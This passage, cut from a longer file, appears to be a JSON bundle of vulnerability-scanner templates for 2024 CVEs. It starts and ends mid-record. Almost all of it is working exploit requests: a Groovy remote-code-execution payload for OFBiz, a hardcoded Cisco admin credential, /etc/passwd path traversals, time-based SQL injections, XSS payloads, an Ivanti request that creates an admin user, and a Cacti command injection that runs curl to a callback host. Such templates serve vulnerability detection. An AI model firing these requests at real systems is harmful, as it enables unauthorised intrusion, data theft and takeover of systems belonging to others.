URI=\"http://{{interactsh-url}}\"/>\t\t\t\t<ds:X509Data/>\t\t\t</ds:KeyInfo>\t\t\t<ds:Object></ds:Object>\t\t</ds:Signature>\t</soap:Body></soap:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-38856","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/main/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20439","info":{"name":"Hardcoded Admin Credentials For Cisco Smart Licensing Utility API","severity":"critical"},"requests":[{"raw":["GET /cslu/v1/scheduler/jobs HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"job_name\":","\"current_status\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6781","info":{"name":"Calibre <= 7.14.0 Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\"extra_file\", {{book_ids}}, \"../../../../../etc/passwd\", \"\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\"result\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27292","info":{"name":"Docassemble - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/interview?i=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[501]}]}]},{"id":"CVE-2024-22927","info":{"name":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>","id=\"eytime\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-35627","info":{"name":"TileServer API - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/v3/?key=%27-alert(document.domain)-%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TileServer","'-alert(document.domain)-'"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5975","info":{"name":"CZ Loan Management <= 1.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"CZ Loan Management\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-23163","info":{"name":"GestSup - Account Takeover","severity":"critical"},"requests":[{"raw":["POST /ajax/ticket_user_db.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: xmlhttprequest\nContent-Type: application/x-www-form-urlencoded\n\nmodifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success","firstname\":\"{{firstname}}\",\"lastname\":\"{{lastname}}"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}],"extractors":[{"type":"dsl","dsl":["\"Firstname: \"+ firstname","\"Lastname: \"+ lastname"]}]}]},{"id":"CVE-2024-1021","info":{"name":"Rebuild <= 3.5.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<h1> Interactsh Server </h1>\")","!contains(body_1, \"<h1> Interactsh Server </h1>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1210","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"quiz_materials\":","quizzes"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9234","info":{"name":"GutenKit <= 2.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/gutenkit-blocks-addon\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nplugin=http://{{interactsh-url}}/{{filename}}.zip\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Failed to unzip plugin\", \"success\\\":false\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6845","info":{"name":"SmartSearchWP < 2.4.6 - OpenAI Key Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/smartsearchwp\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/wdgpt/v1/api-key HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"key\": \"U2FsdGVkX1+X\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"api-key","regex":["\"([^\"]+)\""]}]}]},{"id":"CVE-2024-6289","info":{"name":"WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"WPS Hide Login\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?gf_page={{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), \"wp-login.php\")","contains(header,\"%2F%3Fgf_page%3D{{string}}&reauth=1\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-3922","info":{"name":"Dokan Pro <= 3.10.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Dokan product"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: {{Hostname}}\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302"],"condition":"and"}]}]},{"id":"CVE-2024-29895","info":{"name":"Cacti cmd_realtime.php - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-43160","info":{"name":"BerqWP <= 1.7.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/searchpro\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/optifer/v1/store-webp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimage=\"{{base64(num)}}\"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{num}}\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6922","info":{"name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /v1/proxy/test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"saasUrl\":\"{{interactsh-url}}/?param=one#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"message\":"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2024-1071","info":{"name":"WordPress Ultimate Member 2.1.3 - 2.8.2 \u2013 SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains_all(body_2, \"current_page\", \"total_pages\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([0-9a-z]+)\""],"internal":true}]}]},{"id":"CVE-2024-6646","info":{"name":"Netgear-WN604 downloadFile.php -  Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloadFile.php?file=config"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["system:basicSettings","system:staSettings"],"condition":"and"},{"type":"word","part":"content_type","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32736","info":{"name":"CyberPower < v2.8.3 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"code\":\"([0-9.]+)\""]},{"type":"word","part":"body","words":["\"results\":","{\"status\":\"finished"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"code\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-1183","info":{"name":"Gradio - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2024-3274","info":{"name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/info.cgi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"Build=\", \"Macaddr=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-51483","info":{"name":"Changedetection.io <= 0.47.4 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /settings HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"csrf_token\" value=\"(.*)?\""],"internal":true}]},{"raw":["POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-rss_hide_muted_watches=y&application-pager_size=50&application-notification_urls=&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-base_url=&application-fetch_backend=html_webdriver&application-webdriver_delay=&requests-default_ua-html_requests=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F87.0.4280.66+Safari%2F537.36&requests-default_ua-html_webdriver=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&requests-extra_browsers-0-browser_name=&requests-extra_browsers-0-browser_connection_url=&requests-extra_browsers-1-browser_name=&requests-extra_browsers-1-browser_connection_url=&requests-extra_browsers-2-browser_name=&requests-extra_browsers-2-browser_connection_url=&requests-extra_browsers-3-browser_name=&requests-extra_browsers-3-browser_connection_url=&requests-extra_browsers-4-browser_name=&requests-extra_browsers-4-browser_connection_url=&save_button=Save\n"],"skip-variables-check":true},{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf2","part":"body","group":1,"regex":["name=\"csrf_token\" value=\"(.*)?\""],"internal":true}]},{"raw":["POST /form/add/quickwatch HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff\n"],"matchers":[{"type":"dsl","dsl":["status_code==302"],"internal":true}]},{"raw":["GET /?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"uuid","part":"body","group":1,"regex":["/etc/passwd\"><\\/a>\\n.*?uuid=(.*?)\""],"internal":true}]},{"raw":["GET /preview/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,'root:x:0')","contains(content_type,'text/html')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7008","info":{"name":"Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)","severity":"medium"},"requests":[{"raw":["GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["window.location.href = \"/#book_id=TEST\";window.stop();alert(document.domain);//&panel=book_details"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5276","info":{"name":"Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /{{ctxpath}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"jsessionid","regex":["logon.jsp;jsessionid=([A-Z0-9]+)"],"internal":true}]},{"raw":["GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["logonAnonymous.do"],"internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"anonurl","regex":["href=\"(.*)\" class=\"btn btn-outline-primary\" id=\"logonAnonymousLink\""],"internal":true}]},{"raw":["GET {{anonurl}} HTTP/1.1\nHost: {{Hostname}}\n"]},{"raw":["GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1\nHost: {{Hostname}}\n"]},{"raw":["GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"extractors":[{"type":"regex","part":"body","group":1,"name":"fcweb_token","regex":["name=\"FCWEB.FORM.TOKEN\" value=\"([A-Za-z0-9]+)\""],"internal":true},{"type":"regex","part":"body","group":1,"name":"jsessionid2","regex":["logon.jsp;jsessionid=([A-Z0-9]+)"],"internal":true}]},{"raw":["POST /{{ctxpath}}/logon.do HTTP/1.1\nHost: {{Hostname}}\nCookie: JSESSIONID={{jsessionid2}}\nContent-Type: application/x-www-form-urlencoded\n\nFCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&\n"],"disable-cookie":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username/password are not correct","Your session timed out."],"negative":true},{"type":"word","part":"body","words":["<title>FileCatalyst Workflow Administration</title>","{{to_lower(username)}}"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-22319","info":{"name":"IBM Operational Decision Manager - JNDI Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"patchLevel\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4841","info":{"name":"LoLLMS WebUI - Subfolder Prediction via Path Traversal","severity":"medium"},"requests":[{"raw":["POST /add_reference_to_local_model HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"path\":\"\\\\Users\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{\\\"status\\\":true}\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]},{"raw":["POST /add_reference_to_local_model HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"path\":\"\\\\{{folder}}\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{\\\"status\\\":false,\\\"error\\\":\\\"Model not found\\\"}\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-33288","info":{"name":"Prison Management System - SQL Injection Authentication Bypass","severity":"high"},"requests":[{"raw":["POST /Admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=\n","GET /Admin/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<p>Change Password</p>","<p>Logout</p>","Admin Dashboard | Prison Management system"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5420","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /device/description_en.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\u201c><script>alert(document.domain)</script>\" id=\"standort\"","Host name</label>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7854","info":{"name":"Woo Inquiry <= 0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/woo-inquiry\")"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=woo_wpinq_times_up&dbid=(SELECT(0)FROM(SELECT(SLEEP(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32238","info":{"name":"H3C ER8300G2-X - Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vtyname","vtypasswd","auxauthmode"],"condition":"and"},{"type":"word","part":"content_type","words":["application/x-unknown"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24763","info":{"name":"JumpServer < 3.10.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /{{paths}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"payloads":{"paths":["core/auth/login/?next=//oast.me","auth/login/?next=//oast.me","login/?next=//oast.me"]},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2024-8503","info":{"name":"VICIdial - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /vicidial/welcome.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Agent Login\",\"Timeclock\",\"Administration\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-20767","info":{"name":"Adobe ColdFusion - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1\nHost: {{Hostname}}\n","GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1\nHost: {{Hostname}}\nuuid: {{extracted_uuid}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'wddxPacket')","contains(header_2, 'application/json')","contains(body_2, '/bin/bash')"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"extracted_uuid","group":1,"regex":["<var name='uuid'><string>(.*)</string>"],"internal":true}]}]},{"id":"CVE-2024-24919","info":{"name":"Check Point Quantum Gateway - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /clients/MyCRL HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*","nobody:.*"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8522","info":{"name":"LearnPress \u2013 WordPress LMS - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/learnpress\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","duration_2>=6"]}]}]},{"id":"CVE-2024-41810","info":{"name":"Twisted - Open Redirect & XSS","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"word","part":"response","words":["TWISTED_SESSION","[\"Twisted"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}?url=ws://example.com/\"><script>alert(document.domain)</script>"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["Location: ws://example.com/\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-5084","info":{"name":"Hash Form <= 1.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP /1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{md5(num)}}\n","GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2,\"success\",\"true\",\"url\") && status_code_2 == 200","contains(body_3,\"{{md5(num)}}\") && status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"ajax_nounce\":\"([0-9a-z]+)\",\"preview_img"],"internal":true}]}]},{"id":"CVE-2024-7593","info":{"name":"Ivanti vTM - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1\nHost: {{Hostname}}\n\n_form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["wizardtitletext"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /apps/zxtm/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {[RootURL]}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: {{RootURL}}/apps/zxtm/login.cgi\n\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"_form_submitted\"\n\nform\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_username\"\n\n{{username}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_password\"\n\n{{password}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_submit\"\n\nLogin\n------WebKitFormBoundarycznFUOqD0Y01A9B5--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: /apps/zxtm/","Set-Cookie: ZeusTMZAUTH=","Set-Cookie: ZeusTMZAUTHTIME="],"condition":"and"},{"type":"status","status":[302]}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-7339","info":{"name":"TVT DVR Sensitive Device - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /queryDevInfo HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" 